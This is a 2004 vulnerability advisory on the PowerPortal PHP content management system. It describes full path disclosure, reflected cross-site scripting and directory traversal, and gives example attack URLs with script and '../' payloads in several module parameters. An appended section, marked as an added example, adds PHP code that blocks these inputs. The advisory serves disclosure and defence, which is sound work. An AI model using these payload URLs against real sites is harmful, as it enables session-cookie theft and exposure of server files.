http://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PowerPortal :.:

PROGRAM:  PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION:  v1.x
BUG:      Multiple vulnerabilities
DATE:     23/05/2004
AUTHOR:   DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------

PowerPortal is a popular content management system written in PHP.

2.- Vulnerabilities:
    ---------------

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information.

:.: Examples:

* http://attacker/modules/gallery/resize.php

<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a valid Image resource in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image resource in <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line <b>23</b><br />

* http://attacker/power/modules.php?name=gallery&files=darkbicho

Warning: opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho): failed to open dir: Invalid argument in c:\appserv\www\power\modules\gallery\index.php on line 99

B. Cross-Site Scripting aka XSS:

http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>

http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results

http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results

http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>

C. Arbitrary directory browsing:

* http://attacker/modules.php?name=gallery&files=/../../../

3.- SOLUTION:
    --------

Vendors were contacted many weeks ago and plan to release a fixed version soon.
Check the PowerPortal website for updates and official release details.

4.- Greetings:
    ---------

Greetings to my Peruvian group swp and perunderforce :D

"PISCO IS AND WILL BE PERUVIAN"

5.- Contact
    -------

WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
Security Wari Projects (c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------

DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
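
Added example (not part of the original advisory and not PowerPortal code): one way a PHP application can close the three issue classes above for a parameter like the gallery "files" value. The function names resolve_gallery_dir() and h(), and the temporary directory standing in for the gallery images folder, are assumptions.

```php
<?php
// Added example, not PowerPortal code: function names and the directory
// layout are assumptions made for illustration.

// A. Log warnings instead of sending them (and their full paths) to clients.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// C. Resolve a user-supplied sub-directory; null means "refuse the request".
function resolve_gallery_dir(string $baseDir, string $files): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($files, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks, so the containment
    // check runs on the path that would really be opened.
    $target = realpath($base . DIRECTORY_SEPARATOR . $files);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// B. Encode request data before echoing it into HTML text or attributes.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo: a temporary tree stands in for the gallery images folder.
$images = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
@mkdir($images . DIRECTORY_SEPARATOR . 'holiday', 0700, true);

// Inputs: one legitimate album name plus the "files" values from the advisory.
$inputs = ['holiday', '/../../../', 'darkbicho', '<script>alert(document.cookie);</script>'];
foreach ($inputs as $files) {
    $dir = resolve_gallery_dir($images, $files);
    echo h($files), ' => ', $dir === null ? 'rejected' : 'listing allowed', "\n";
}
```

Only the existing "holiday" directory is accepted; the other three values are refused before any opendir() call, and the script payload is printed HTML-encoded rather than as markup.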